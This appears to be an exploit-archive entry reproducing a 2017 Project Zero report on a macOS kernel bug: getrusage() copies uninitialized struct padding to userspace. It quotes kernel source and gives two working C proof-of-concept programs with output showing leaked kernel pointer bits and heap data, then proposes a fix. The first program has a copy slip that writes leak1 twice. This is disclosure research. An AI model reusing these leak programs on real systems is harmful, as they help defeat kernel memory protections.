macOS - 'getrusage' Stack Leak Through struct Padding

Properties

Published:
12.12.2017
Target:
macOS

Code

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405
 
For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:
 
int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
  struct rusage *rup, rubuf;
  struct user64_rusage rubuf64;
  struct user32_rusage rubuf32;
  size_t retsize = sizeof(rubuf);     // default: 32 bits 
  caddr_t retbuf = (caddr_t)&rubuf;   // default: 32 bits 
  struct timeval utime;
  struct timeval stime;
 
 
  switch (uap->who) {
  case RUSAGE_SELF:
    calcru(p, &utime, &stime, NULL);
    proc_lock(p);
    rup = &p->p_stats->p_ru;
    rup->ru_utime = utime;
    rup->ru_stime = stime;
 
    rubuf = *rup;
    proc_unlock(p);
 
    break;
  [...]
  }
  if (IS_64BIT_PROCESS(p)) {
    retsize = sizeof(rubuf64);
    retbuf = (caddr_t)&rubuf64;
    munge_user64_rusage(&rubuf, &rubuf64);
  } else {
    [...]
  }
 
  return (copyout(retbuf, uap->rusage, retsize));
}
 
`munge_user64_rusage()` performs the conversion by copying individual fields:
 
__private_extern__  void 
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
  // timeval changes size, so utime and stime need special handling 
  a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
  a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
  a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
  a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}
 
`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:
 
#define _STRUCT_USER64_TIMEVAL    struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
  user64_time_t            tv_sec;        // seconds 
  __int32_t                tv_usec;       // and microseconds 
};
 
struct  user64_rusage {
  struct user64_timeval ru_utime; // user time used 
  struct user64_timeval ru_stime; // system time used 
  user64_long_t ru_maxrss;    // max resident set size 
[...]
};
 
This padding is not initialized, but is copied to userspace.
 
 
The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.
 
 
Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.
The returned data seems to come from the previous syscall:
 
$ cat test.c
#include 
#include 
#include 
#include 
#include 
#include 
 
void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak1, ((char*)&ru)+28, 4);
  printf("leak1: 0x%08x\n", leak1);
  printf("leak2: 0x%08x\n", leak2);
}
 
int main(void) {
  do_leak();
  do_leak();
  do_leak();
  int fd = open("/dev/null", O_RDONLY);
  do_leak();
  int dummy;
  read(fd, &dummy, 4);
  do_leak();
  return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000
 
 
However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:
 
$ cat forktest.c 
*/
 
#include 
#include 
#include 
#include 
#include 
#include 
 
void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak2, ((char*)&ru)+28, 4);
  char str[1000];
  if (leak1 != 0) {
    sprintf(str, "leak1: 0x%08x\n", leak1);
    write(1, str, strlen(str));
  }
  if (leak2 != 0) {
    sprintf(str, "leak2: 0x%08x\n", leak2);
    write(1, str, strlen(str));
  }
}
 
void leak_in_child(void) {
  int res_pid, res2;
  asm volatile(
    "mov $0x02000002, %%rax\n\t"
    "syscall\n\t"
  : "=a"(res_pid), "=d"(res2)
  :
  : "cc", "memory", "rcx", "r11"
  );
  //write(1, "postfork\n", 9);
  if (res2 == 1) {
    //write(1, "child\n", 6);
    do_leak();
    char dummy;
    read(0, &dummy, 1);
    asm volatile(
      "mov $0x02000001, %rax\n\t"
      "mov $0, %rdi\n\t"
      "syscall\n\t"
    );
  }
  //printf("fork=%d:%d\n", res_pid, res2);
  int wait_res;
  //wait(&wait_res);
}
 
int main(void) {
  for(int i=0; i<1000; i++) {
    leak_in_child();
  }
}
/*
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b
 
The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.
 
 
Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
*/